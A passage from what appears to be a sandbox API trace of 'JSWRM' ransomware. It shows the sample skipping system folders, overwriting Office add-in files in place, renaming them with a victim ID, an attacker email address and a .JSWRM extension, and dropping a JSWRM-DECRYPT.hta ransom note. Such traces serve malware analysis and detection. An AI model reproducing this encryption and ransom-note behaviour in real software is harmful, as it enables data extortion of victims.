hHeap=0x1e0000) returned 1 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.226] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15d3adab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d871e6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fd7f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ro.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2=".") returned 1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="..") returned 1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="...") returned 1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="windows") returned -1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="recovery") returned -1 [0125.226] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="perflogs") returned 1 [0125.227] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="documents and settings") returned 1 [0125.227] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.227] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="system volume information") returned -1 [0125.227] lstrcmpiW (lpString1="PowerViewRes.ro.xap", lpString2="msocache") returned 1 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ro.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ro.xap", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ro.xap", lpUsedDefaultChar=0x0) returned 19 [0125.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ro.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ro.xap", cchWideChar=19, lpMultiByteStr=0x2411f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ro.xap", lpUsedDefaultChar=0x0) returned 19 [0125.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0125.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\PowerViewRes.ro.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\powerviewres.ro.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.229] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=327039) returned 1 [0125.229] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.230] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.244] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.244] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.245] CloseHandle (hObject=0x338) returned 1 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0125.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0125.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0125.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.245] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\PowerViewRes.ro.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\powerviewres.ro.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\PowerViewRes.ro.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\powerviewres.ro.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0125.247] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15d3adab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d871e6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fd7f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ro.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.247] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0125.247] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0125.247] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="...") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="windows") returned -1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="recovery") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="perflogs") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="documents and settings") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="$RECYCLE.BIN") returned 1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="system volume information") returned -1 [0125.248] lstrcmpiW (lpString1="ru", lpString2="msocache") returned 1 [0125.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0125.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0125.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\jswrm-decrypt.hta")) returned 0xffffffff [0125.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0125.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0125.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0125.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0125.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0125.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.251] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.251] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.252] CloseHandle (hObject=0x314) returned 1 [0125.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0125.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0125.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0125.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0125.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0125.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\jswrm-decrypt.hta")) returned 0x20 [0125.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0125.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4151d065, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0125.254] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.254] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4151d065, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.254] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.254] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.254] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d50bdc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d50bdc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.254] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.255] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4151d065, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4151d065, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4151d065, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.255] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0125.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.255] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45d3b76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.255] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.255] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.255] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.255] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 